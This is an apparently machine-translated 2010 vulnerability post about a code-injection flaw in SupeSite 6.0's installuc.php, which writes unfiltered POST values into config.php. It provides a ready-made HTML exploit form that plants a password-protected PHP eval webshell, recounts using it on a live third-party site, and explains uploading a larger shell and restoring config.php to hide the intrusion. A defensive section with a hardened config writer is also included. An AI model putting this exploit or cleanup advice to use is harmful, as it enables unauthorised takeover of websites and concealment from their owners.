SupeSite 6.0 0day: direct access to a webshell - vulnerability warning - the black bar safety net

2010-03-11T00:00:00
ID MYHACK58:62201026393
Type myhack58
Reporter 佚名 (anonymous)
Modified 2010-03-11T00:00:00

Description

To me this one feels a bit bland, because the vulnerable file is a configuration script: if the target site has already been configured through this file, the vulnerability cannot be exploited, and even if it has not been configured, exploitation may still fail. Of course, there is still a portion of sites that were never configured through this file. Although the official SupeSite release is now at 7.0, 6.0 is still in use on many servers, so it remains a threat to a small portion of sites, and very few people know about this vulnerability. To cut to the chase: the vulnerability is in the installuc.php file. The source code downloaded from the official site is Zend-encrypted; it can be decrypted at dezend.cc, or with a tool. Being lazy, I simply went online to find a test target and found one, as shown in Figure 1:

[Figure 1]

[Figure 2] If this page is displayed, the site has indeed not been configured, which means it may be exploitable. Looking at the source code, there are a few passages like this:

else if ( $step == 1 )
{
    ......
}
else if ( $step == 2 )
{
    ......
}
else if ( $step == 3 )
{
    ......
}

These are the first, second and third configuration steps. The vulnerability is in the step=3 branch:

function insertconfig( $s, $find, $replace ) /* write function */
{
    ......
}

$ssconfig = S_ROOT."/config.php";
$ucdbhost = $_POST['ucdbhost']; /* the variable we want to use */
$ucdbuser = $_POST['ucdbuser'];
......
$s = file_get_contents( $ssconfig );
$s = trim( $s );
$s = substr( $s, 0 - 2 ) == "?>" ? substr( $s, 0, 0 - 2 ) : $s;
$s = insertconfig( $s, "/define\\('UC_CONNECT',\\s*'.*?'\\);/i", "define('UC_CONNECT', 'mysql');" ); /* call write function */
$s = insertconfig( $s, "/define\\('UC_DBHOST',\\s*'.*?'\\);/i", "define('UC_DBHOST', '{$ucdbhost}');" );
$s = insertconfig( $s, "/define\\('UC_DBUSER',\\s*'.*?'\\);/i", "define('UC_DBUSER', '{$ucdbuser}');" );
......
if ( ! ( $fp = @fopen( $ssconfig, "w" ) ) )
{
    instmsg( "configuration file write failed, please return and check that ./config.php permission is 0777" );
}
@fwrite( $fp, $s );
@fclose( $fp );
if ( $fp = @fopen( $lockfile, "w" ) )
{
    fwrite( $fp, "" );
    fclose( $fp );
}
print "\t<table class=\"showtable\">\r\n\t<tr><td><strong># the configuration is complete</strong></td></tr>\r\n\t<tr><td id=\"msg1\">\r\n\t<br /> Completed UCenter configuration, please visit the FTP delete installuc.php this file\r\n\t<br />\r\n\t<br /><a href=\"javascript:;\" onclick=\"javascript:backwindow('installuc', '');\">click to return to the main interface,the next step of the operation</a>\r\n\t</td></tr>\r\n\t\r\n\t</table>";

There is a lot of code, and similar code is omitted. From the code above we can see that the variables are taken from POST input and written directly into config.php without any filtering.
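As an added example (not SupeSite's code; all function names are hypothetical), here is the unsafe string assembly behind the define() lines above next to a hardened version that quotes the value with var_export(), validates the host, and inserts the line literally through a callback:

```php
<?php
// Added example, not SupeSite's code: the unsafe define() assembly used by
// installuc.php beside a hardened version. All function names are hypothetical.

// Unsafe: the POST value is pasted into PHP source, so a quote followed by
// ');' ends the string literal and whatever follows is parsed as PHP.
function buildDefineUnsafe(string $name, string $value): string
{
    return "define('{$name}', '{$value}');";
}

// Hardened: var_export() yields a correctly quoted literal, so quotes,
// backslashes and '?>' inside the value all stay inside the string.
function buildDefineSafe(string $name, string $value): string
{
    if (!preg_match('/^[A-Z_][A-Z0-9_]*$/', $name)) {
        throw new InvalidArgumentException('bad constant name');
    }
    return 'define(' . var_export($name, true) . ', ' . var_export($value, true) . ');';
}

// A DB host should look like host, host:port or a socket path; anything
// else is rejected before it ever reaches the config writer.
function isPlausibleDbHost(string $host): bool
{
    return (bool) preg_match('~^([A-Za-z0-9.\-]+(:\d{1,5})?|/[\w./\-]+)$~', $host);
}

// Rewrite the define() line via a callback so the new text is inserted
// literally (preg_replace would interpret backslashes in the replacement).
function setDefine(string $src, string $name, string $value): string
{
    if ($name === 'UC_DBHOST' && !isPlausibleDbHost($value)) {
        throw new InvalidArgumentException('refusing suspicious DB host');
    }
    $line = buildDefineSafe($name, $value);
    $re = "/define\\(\\s*'" . preg_quote($name, '/') . "'\\s*,\\s*'.*?'\\s*\\);/";
    $count = 0;
    $out = preg_replace_callback($re, fn () => $line, $src, 1, $count);
    return $count > 0 ? $out : rtrim($src) . "\n" . $line . "\n";
}

// Constructed input shaped like the one in the write-up, with a neutral marker.
$injected = "');injected_code();?>";
echo buildDefineUnsafe('UC_DBHOST', $injected), "\n";   // literal is broken open
echo buildDefineSafe('UC_DBHOST', $injected), "\n";     // stays one inert string
```

The installer should additionally refuse every step once the lock file written at the end of step 3 exists, since the page's own code only creates it and never checks it before writing.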

Now I provide a simple exploit page:

<html>
<body>
<div class="bodydiv">
<h1>configuration table</h1>
<div style="width:90%;margin:0 auto;">
<br><form id="theform" method="post" action="http://www.xxx.com/installuc.php?step=3">
<table class="showtable">
<tr><td><strong># fill in the relevant information, don't share it! thx</strong></td></tr>
<tr><td id="msg1">here set UCenter related information</td></tr>
</table>
<br>
<table class="datatable">
<tr>
<td width="15%">$code:</td>
<td><input type="text" id="ucdbhost" name="ucdbhost" size="60" value="\');eval($_POST[sunwear]);?&gt;"></td>
<td width="20%"> </td>
</tr>
</table>
<input type="hidden" name="apptype" value="SUPESITE">
<p align="center">
<input type="submit" name="submit" value=" submit " style="height: 25">
</p>
</form></div>
<div id="footer">© Comsenz Inc. 2001-2008 www.supesite.com</div>
</div>
<br>
</body>
</html>

Replace the address inside with the target address. In my code the step parameter is 3, so simply submitting the variable content we want is enough; no other settings are needed. The Trojan is a one-line PHP shell with the connection password sunwear. Now I take the test target I found and test it. If the content returned after submission is:

The configuration is complete

Completed UCenter configuration, please visit the FTP delete installuc.php this file

Click to return to the main interface, proceed to the next operation

then the submission succeeded, and visiting the config.php page will display:

'); // UCenter database host
define('UC_DBUSER', ''); // UCenter database user name
define('UC_DBPW', ''); // UCenter database password
define('UC_DBNAME', ''); // UCenter database name
define('UC_DBCHARSET', ''); // UCenter database character set
define('UC_DBTABLEPRE', "`.'); // UCenter database table prefix
define('UC_DBCONNECT', '0'); // UCenter database persistent connection 0=off, 1=on
// communication-related
define('UC_KEY', ''); // UCenter communication key, must be consistent with UCenter
define('UC_API', ''); // UCenter URL address, relied on when fetching pictures
define('UC_CHARSET', ''); // UCenter character set
define('UC_IP', ''); // UCenter IP; set this when UC_CONNECT is not mysql mode and the current application server has trouble resolving the domain name
define('UC_APPID', ''); // current application ID
// ============================================================================
define('UC_PPP', '20');

This means the Trojan has been written into config.php. It displays this way because the injected code ends with "?>", which is what lets the PHP Trojan code be parsed; everything after it is treated as ordinary text and displayed. Now connect to the target site with the PHP one-line Trojan, and a larger shell can then be uploaded. The phpinfo() output shows a Linux operating system. This vulnerability is not affected by the gpc switch, and it also affects Windows; on some Windows hosts where PHP runs with higher privileges, a php webshell can execute system commands directly. After gaining access we must not forget one thing: if config.php contains this, the home page will show an error, so the file must be restored to normal by replacing the line below:

define('UC_DBHOST', '\\');eval($_POST[sharpwinner]);?>');

with

define('UC_DBHOST', '');

and that is it.

The above is a successful example. On some sites, after the "configuration is complete" prompt appears, visiting config.php shows a blank page; that means the attempt failed.